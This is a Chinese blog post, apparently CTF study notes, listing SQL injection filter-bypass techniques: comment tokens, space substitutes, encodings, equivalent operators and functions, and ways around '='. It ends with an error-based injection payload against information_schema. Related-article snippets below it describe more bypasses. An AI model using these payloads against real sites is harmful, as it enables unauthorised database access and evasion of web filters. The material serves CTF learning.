SQL注入常用到的绕过方式-ctf

最新推荐文章于 2024-05-03 02:14:06 发布
最新推荐文章于 2024-05-03 02:14:06 发布
阅读量1.3k 收藏 11
点赞数 1
分类专栏: 学海无涯
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/qq_38656841/article/details/102865126
版权

(1)注释
#、--、-- -、--+、/**/、/*letmetest*/、;%00
(2)空格
SQL中可以代替空格中字符有
/**/、()、+、%20、%09、%0a、0x0a、0x0b、0x0c、0x0d等
还可以使用的有
+、-、~、. 等
我们在拼接语句的时候就可以在这里使用,比如
uinion+select+1,2

(3)编码

Hex编码、URL编码、宽字节、 Un i code编码(is支持)

①、URL编码:%66%72%20%31%3d%31(and 1=1)

②、 Uni code编码: un%u0069on

(4)等价字符以及等价函数

and or xor 的过滤

1. and => &&

2. or => ||

3. xor => ^

4. not => !

等价函数

hex()、 bin()==>ascii()

concat_ws()==>group_concat()

sleep()==>benchmark()

mid()、substr()==>substring()

@@user==user()

@datadir==datadir()

获取列数、表名、表名、库名

 过滤等号绕过

二、使用<>绕过<>等价于  != 所以我们可以在<>前加个!就变成等于了。

例如:d=-1 union select from users where (id<2)%23

使用like绕过=

使用通配符like执行的效果和 = 一致

所以可以用来绕过等号过滤。-1 union select from users where id like 2%23

报错注入

?id=1'union select 1,count(*),concat((select user()),floor(rand(0)*2)) as a from information_schema.schemata group by a--+

时光凉春衫薄
关注
  • 1
    点赞
  • 11
    收藏
    觉得还不错? 一键收藏
  • 打赏
    打赏
  • 0
    评论
专栏目录
CTF之web学习记录 -- SQL注入检测绕过
lifanxin的博客
05-19 962
SQL注入检测绕过概述大小写绕过双写绕过编码绕过内联注释绕过总结 概述   在学习了一些基本的sql注入知识以及注入技巧后,本篇博客将会总结一些常见的sql注入检测绕过方法。 大小写绕过   大小写绕过很好理解,后端程序会过滤掉一些关键词,比如:select/union/and,此时就无法达到注入的效果。想要绕过这种检测,只需要大写某些字母即可,比如:selEct/UniOn/And,之所以可以这样绕过,一是因为后端的检测逻辑不够完善,二是mysql并不区分大小写。 双写绕过   双写绕过ctf比赛中十分
网络安全笔记--SQL注入
swy66的博客
08-12 7109
SQL注入
2024年最新ctfshow-WEB-web10( with rollup注入绕过)_ctf(2)
最新发布
2401_84267585的博客
05-03 628
ctf.show WEB模块第10关是一个SQL注入漏洞, 点击取消按钮可以获取源码, 审计代码可以发现源码中存在漏洞, 推荐使用with rollup注入进行绕过, 此关卡过滤了空格,and等关键字进来以后是一个登录界面, 盲猜是SQL注入漏洞点击取消按钮可以获取这一关的源码, 下载到本地即可源码中先根据用户名查询用户信息, 用户名通过以后, 再判断密码是否相同, 我们绕过用户名的过滤条件, 在使用 with rollup注入绕过密码。
sql注入绕过技巧
m_ing
10-21 1888
前言 今天斗胆来整理一下sql注入的各种绕过姿势,以后方便查阅。SQL注入绕过技巧有很多,具体的绕过技巧需要看具体的环境,而且很多的绕过方法需要有一个实际的环境,最好是你在渗透测试的过程中遇到的环境,否则如果仅仅是自己凭空想,那显然是不靠谱的。 1.括号绕过空格 如果空格被过滤,括号没有被过滤,可以用括号绕过。 在MySQL中,括号是用来包围子查询的。因此,任何可以计算出结果的语句,都可以用括号包围起来。而括号的两端,可以没有多余的空格。 例如: select(user())from dual where
SQL注入绕过空格
nihao_ma_的博客
05-07 1977
SQL注入之空格绕过技巧
buuctf 刷题5(sql注入篇)
weixin_63231007的博客
05-10 4006
sql注入挺难的我感觉,但是很重要,有好多绕过,和注入手段需要一步步在尝试,因此本章刷一下buuctf各个sql注入题目,来巩固联系一下自己在sql注入方面的知识。 [极客大挑战 2019]HardSQL 1 输入1',出错,1'#显示不同,存在单引号闭合注入。 order by查字段,union,堆叠注入,和输入数字都烦返回错误 =,空格,和好多关键字都被过滤了。 空格用()绕过,=用like绕过。 尝试报错注入: 1'or(updatexml(1,concat...
mysql&&sql注入+ctf+web安全
10-08
mysql&&sql注入+ctf+web安全
SQL注入绕过的技巧总结
12-14
这篇文章是总结我在遇到的CTF题目或者是渗透环境的过程中,所使用到的sql注入绕过技巧,这篇文章随着自己的见识和能力不断的提升,所总结的方法也会变多。  一、引号绕过  会使用到引号的地方是在于后的whe
google-ctf:Google CTF
02-04
Google CTF 该存储库列出了2017-2019 Google CTF中使用的大多数挑战以及可用于运行这些挑战的大多数基础结构。 重要信息-2017、2018、2019和2020文件夹中的代码具有未修复的安全漏洞。 这些是故意存在的,并且在...
SQLi-CTF-master.zip
04-09
- **ASCII与十六进制转换**:在某些情况下,需要转换字符编码以绕过过滤。 4. **解题技巧**: - **理解题意**:分析题目给出的信息,确定可能的注入点。 - **信息收集**:利用注入获取数据库名、表名、列名等...
saigar-ctf:Saigar CTF 平台
05-29
赛加尔CTF世界上第一个众包调查的 CTF 平台介绍Saigar CTF 是一个开源 CTF 平台,用于促进众包调查,可以扩展到数百个具有实时数据的并发用户。 Saigar CTF 平台促成的最大事件有500 多个用户,在6 小时内提交了8,...
#ctf解题姿势#一些绕过方法
vircorns的博客
08-12 2371
绕过WAF的方法 大小写混合 小写或大写的关键字匹配技术,正则表达式/express/i 大小写敏感即无法绕过 替换关键字 大小写转化无法绕过,而且正则表达式会替换或删除select、union这些关键字,如果只匹配一次就很容易绕过 举例:?id=-15 UNIunionON SELselectECT 1,2,3,4 使用编码 URL编码 ,存在一种情况URL编码只进行了一次过滤,可以用...
SQL注入漏洞(绕过篇)
errorr0
06-24 4706
SQL注入绕过手法
sql注入详解
m0_67392811的博客
06-12 5858
目录前言? ?一、漏洞原因分析二、漏洞危害三、sql注入防范四、如何挖掘sql注入漏洞五、常见的注入手法联合查询(union注入)报错注入基于布尔的盲注基于时间的盲注HTTP头注入宽字节注入堆叠查询二阶注入六、sql注入getshell的几种方式结构化查询语言(Structured Query Language,缩写:SQL),是一种特殊的编程语言,用于数据库中的标准数据查询语言。SQL注入(SQL Injection)是一种常见的Web安全漏洞,主要形成的原因是在数据交互中,前端的数据传入到后台处理时,没
SQL注入 空格转换为空绕过
m_de_g的博客
12-09 1621
SQL注入 空格转换为空绕过 一、基础知识 1.preg_replace函数 preg_replace(mixed $pattern,mixed $replacement,mixed $subject):执行一个正则表达式的搜索和替换。 $pattern:要搜索的模式,可以是字符串或一个字符串数组 $replacement:用于替换的字符串或字符串组。 $subject:要搜索替换的目标字符串或字符串数组 function blacklist($id) { $id= preg_replace('/or/
ctf sql注入关键词绕过【积累中】
热门推荐
Sp4rkW的博客
09-25 2万+
写在前面:这个博客知识点来源于个人ctf练习比赛中积累的知识点及网络中各个博客的总结点,这里做测试和记录 0x00 sql注入理解 SQL注入能使攻击者绕过认证机制,完全控制远程服务器上的数据库。 SQL是结构化查询语言的简称,它是访问数据库的事实标准。目前,大多数Web应用都使用SQL数据库来存放应用程序的数据。几乎所有的Web应用在后台 都使用某种SQL数据库。跟大多数语言一...
一个SQL注入绕过分析(来源swpu web700)
技术学习人生
10-31 3380
访问页面提示:Hello Guest! please use in Admin! 查看cookie是user=DWJ6Ti0bEyhVIwsrK09/G3gSWygIfAJ9QjR2VFk2TjpMeAM4OAYHJFU/ASdRanFVRWEEd0hzBnJxSUl6BmhNaA1oehEtUBMwVWMLKytPfxt4GlswCCoCMkIkdhNZNU54THYDbzgFB2BVbwE0U
SQL注入绕过空格过滤
gam0n的博客
06-05 1万+
一、通过注释绕过空格注释即/**/通过注释取代空格eg:  or/**/'me'/**/=/**/'isme'二、通过括号绕过空格eg: and(1=0)
ctf sql注入题目
09-15
2. CTFSHOW-sql注入(一) 这是CTFSHOW平台上的一个系列题目,主要介绍了SQL注入的基础知识点和常见题型。参与者可以通过完成不同的题目来逐步提升自己的SQL注入技能。 3. web 171(万能密码) 这是一个具有万能密码...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包

打赏作者

时光凉春衫薄

你的鼓励将是我创作的最大动力

¥1 ¥2 ¥4 ¥6 ¥10 ¥20
扫码支付:¥1
获取中
扫码支付

您的余额不足,请更换扫码支付或充值

打赏作者

实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值